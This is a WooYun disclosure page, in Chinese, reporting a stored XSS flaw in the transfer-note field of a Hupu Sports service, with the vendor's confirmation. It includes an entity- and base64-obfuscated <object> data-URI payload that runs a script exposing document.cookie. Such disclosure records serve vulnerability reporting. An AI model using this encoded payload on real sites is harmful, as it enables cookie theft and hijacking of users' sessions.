当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071451

漏洞标题:虎扑体育某业务存储型XSS一枚

相关厂商:虎扑体育网

漏洞作者: 路人甲

提交时间:2014-08-07 17:50

修复时间:2014-09-21 17:52

公开时间:2014-09-21 17:52

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-07: 细节已通知厂商并且等待厂商处理中
2014-08-07: 厂商已经确认,细节仅向厂商公开
2014-08-17: 细节向核心白帽子及相关领域专家公开
2014-08-27: 细节向普通白帽子公开
2014-09-06: 细节向实习白帽子公开
2014-09-21: 细节向公众公开

简要描述:

为邀请码而来 第一次提交 好净长 警长 京张 进账 紧张

详细说明:

转账附言未过滤完全 

<object data="&#100;&#97;&#116;&#97;&#58;&#116;&#101;&#120;&#116;&#47;&#104;&#116;&#109;&#108;&#59;&#98;&#97;&#115;&#101;&#54;&#52;&#44;&#80;&#72;&#78;&#106;&#99;&#109;&#108;&#119;&#100;&#68;&#53;&#104;&#98;&#71;&#86;&#121;&#100;&#67;&#104;&#107;&#98;&#50;&#78;&#49;&#98;&#87;&#86;&#117;&#100;&#67;&#53;&#106;&#98;&#50;&#57;&#114;&#97;&#87;&#85;&#112;&#80;&#67;&#57;&#122;&#89;&#51;&#74;&#112;&#99;&#72;&#81;&#43;">


2.png


1.png


只在firefox下可用 chrome的DATA中不能引用COOKIE

漏洞证明:

1.png

修复方案:

比我懂

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2014-08-07 18:01

厂商回复:

已从其他渠道得知该漏洞。还是感谢白帽子。

最新状态:

暂无